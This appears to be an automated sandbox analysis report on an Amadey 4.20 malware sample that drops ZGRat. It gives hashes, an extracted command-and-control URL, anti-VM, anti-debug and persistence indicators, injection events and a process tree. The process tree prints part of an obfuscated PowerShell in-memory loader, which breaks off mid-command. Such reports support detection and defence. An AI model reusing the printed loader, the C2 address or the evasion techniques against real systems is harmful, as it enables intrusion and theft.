Analysis
-
max time kernel
150s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 22:31
Static task
static1
Behavioral task
behavioral1
Sample
ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
Resource
win10v2004-20240508-en
General
-
Target
ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe
-
Size
1.8MB
-
MD5
a99882f9b749bc3828ae0bbba5f8ab42
-
SHA1
245713f0928010e1534fd2ddef7788b77ebeabde
-
SHA256
ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd
-
SHA512
9c641af50a8132673e0af32f1eee948bba1a4d6156e76d1141f7fcefc8078b8abe8360c50878ba95899669ee952b988d0169eb9bc3a0a246d9a91af60cb151a5
-
SSDEEP
49152:daXs8646GIMTbxlNYvYrhxajmczF772EPUlD0:MX9f6GI+NP2uJUaEPUK
Malware Config
Extracted
amadey
4.20
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Signatures
-
Detect ZGRat V1 33 IoCs
resource yara_rule behavioral1/memory/3620-43-0x0000000006A90000-0x0000000006CD0000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-47-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-49-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-57-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-63-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-65-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-71-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-69-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-67-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-61-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-59-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-53-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-55-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-51-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-46-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-77-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-75-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-74-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-81-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-105-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-107-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-103-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-101-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-99-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-97-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-95-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-93-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-92-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-89-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-87-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-85-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-79-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 behavioral1/memory/3620-83-0x0000000006A90000-0x0000000006CCA000-memory.dmp family_zgrat_v1 -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 8 created 4108 8 WerFault.exe 105 PID 4192 created 4108 4192 WerFault.exe 105 -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 468 created 616 468 powershell.EXE 5 PID 4984 created 4108 4984 svchost.exe 105 PID 4984 created 4108 4984 svchost.exe 105 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation axplons.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs Kaxhwswfup.exe -
Executes dropped EXE 7 IoCs
pid Process 4548 axplons.exe 460 axplons.exe 3620 Kaxhwswfup.exe 704 $77ea4744 4108 $77c1559d 2148 axplons.exe 3236 axplons.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine axplons.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2300 ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe 4548 axplons.exe 460 axplons.exe 2148 axplons.exe 3236 axplons.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3620 set thread context of 704 3620 Kaxhwswfup.exe 101 PID 468 set thread context of 3088 468 powershell.EXE 104 PID 3620 set thread context of 4108 3620 Kaxhwswfup.exe 105 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\axplons.job ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4672 4108 WerFault.exe 105 1364 4108 WerFault.exe 105 -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 42 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2300 ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe 2300 ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe 4548 axplons.exe 4548 axplons.exe 460 axplons.exe 460 axplons.exe 468 powershell.EXE 468 powershell.EXE 468 powershell.EXE 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3620 Kaxhwswfup.exe 3620 Kaxhwswfup.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 4672 WerFault.exe 4672 WerFault.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 4984 svchost.exe 4984 svchost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 3620 Kaxhwswfup.exe Token: SeDebugPrivilege 468 powershell.EXE Token: SeDebugPrivilege 468 powershell.EXE Token: SeDebugPrivilege 3088 dllhost.exe Token: SeDebugPrivilege 3620 Kaxhwswfup.exe Token: SeShutdownPrivilege 1016 dwm.exe Token: SeCreatePagefilePrivilege 1016 dwm.exe Token: SeRestorePrivilege 4672 WerFault.exe Token: SeBackupPrivilege 4672 WerFault.exe Token: SeShutdownPrivilege 3496 Explorer.EXE Token: SeCreatePagefilePrivilege 3496 Explorer.EXE Token: SeShutdownPrivilege 3496 Explorer.EXE Token: SeCreatePagefilePrivilege 3496 Explorer.EXE Token: SeShutdownPrivilege 1016 dwm.exe Token: SeCreatePagefilePrivilege 1016 dwm.exe Token: SeShutdownPrivilege 3496 Explorer.EXE Token: SeCreatePagefilePrivilege 3496 Explorer.EXE -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3496 Explorer.EXE 4036 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2300 wrote to memory of 4548 2300 ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe 93 PID 2300 wrote to memory of 4548 2300 ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe 93 PID 2300 wrote to memory of 4548 2300 ad8aa6b2b0bb55b0390530d9440a92a75c8cf5bcc51d47f44c1d9b3143f28afd.exe 93 PID 4548 wrote to memory of 3620 4548 axplons.exe 97 PID 4548 wrote to memory of 3620 4548 axplons.exe 97 PID 4548 wrote to memory of 3620 4548 axplons.exe 97 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 3620 wrote to memory of 704 3620 Kaxhwswfup.exe 101 PID 468 wrote to memory of 3088 468 powershell.EXE 104 PID 468 wrote to memory of 3088 468 powershell.EXE 104 PID 468 wrote to memory of 3088 468 powershell.EXE 104 PID 468 wrote to memory of 3088 468 powershell.EXE 104 PID 468 wrote to memory of 3088 468 powershell.EXE 104 PID 468 wrote to memory of 3088 468 powershell.EXE 104 PID 468 wrote to memory of 3088 468 powershell.EXE 104 PID 468 wrote to memory of 3088 468 powershell.EXE 104 PID 3088 wrote to memory of 616 3088 dllhost.exe 5 PID 3088 wrote to memory of 672 3088 dllhost.exe 7 PID 3088 wrote to memory of 948 3088 dllhost.exe 12 PID 3088 wrote to memory of 1016 3088 dllhost.exe 13 PID 3088 wrote to memory of 416 3088 dllhost.exe 14 PID 3088 wrote to memory of 1052 3088 dllhost.exe 16 PID 3088 wrote to memory of 1100 3088 dllhost.exe 17 PID 3088 wrote to memory of 1124 3088 dllhost.exe 18 PID 3088 wrote to memory of 1184 3088 dllhost.exe 19 PID 3088 wrote to memory of 1204 3088 dllhost.exe 20 PID 3088 wrote to memory of 1288 3088 dllhost.exe 21 PID 3088 wrote to memory of 1312 3088 dllhost.exe 22 PID 3088 wrote to memory of 1320 3088 dllhost.exe 23 PID 3088 wrote to memory of 1448 3088 dllhost.exe 24 PID 3088 wrote to memory of 1472 3088 dllhost.exe 25 PID 3088 wrote to memory of 1496 3088 dllhost.exe 26 PID 3088 wrote to memory of 1508 3088 dllhost.exe 27 PID 3088 wrote to memory of 1664 3088 dllhost.exe 28 PID 3088 wrote to memory of 1716 3088 dllhost.exe 29 PID 3088 wrote to memory of 1728 3088 dllhost.exe 30 PID 3088 wrote to memory of 1796 3088 dllhost.exe 31 PID 3088 wrote to memory of 1876 3088 dllhost.exe 32 PID 3088 wrote to memory of 1996 3088 dllhost.exe 33 PID 3088 wrote to memory of 1352 3088 dllhost.exe 34 PID 3088 wrote to memory of 1348 3088 dllhost.exe 35 PID 3088 wrote to memory of 1568 3088 dllhost.exe 36 PID 3088 wrote to memory of 2116 3088 dllhost.exe 37 PID 3088 wrote to memory of 2140 3088 dllhost.exe 38 PID 3088 wrote to memory of 2288 3088 dllhost.exe 39 PID 3088 wrote to memory of 2396 3088 dllhost.exe 41 PID 3088 wrote to memory of 2456 3088 dllhost.exe 42 PID 3088 wrote to memory of 2492 3088 dllhost.exe 43 PID 3088 wrote to memory of 2656 3088 dllhost.exe 44 PID 3088 wrote to memory of 2716 3088 dllhost.exe 45 PID 3088 wrote to memory of 2732 3088 dllhost.exe 46 PID 3088 wrote to memory of 2740 3088 dllhost.exe 47 PID 3088 wrote to memory of 2852 3088 dllhost.exe 48 PID 3088 wrote to memory of 2912 3088 dllhost.exe 49 PID 3088 wrote to memory of 2944 3088 dllhost.exe 50 PID 3088 wrote to memory of 2964 3088 dllhost.exe 51 PID 3088 wrote to memory of 2980 3088 dllhost.exe 52
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{349df8a7-7062-481f-95b3-3bea866e6f18}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3088
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1052
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1124
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1204
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2656
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SHDTvOeefjQR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dvvFHhherwTghR,[Parameter(Position=1)][Type]$tLvfoLsHxH)$grNmOjMdnJl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+[Char](115)+',P'+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$grNmOjMdnJl.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+''+'P'+'u'+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$dvvFHhherwTghR).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$grNmOjMdnJl.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'Sl'+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$tLvfoLsHxH,$dvvFHhherwTghR).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $grNmOjMdnJl.CreateType();}$ugtWeUYzVAgJn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 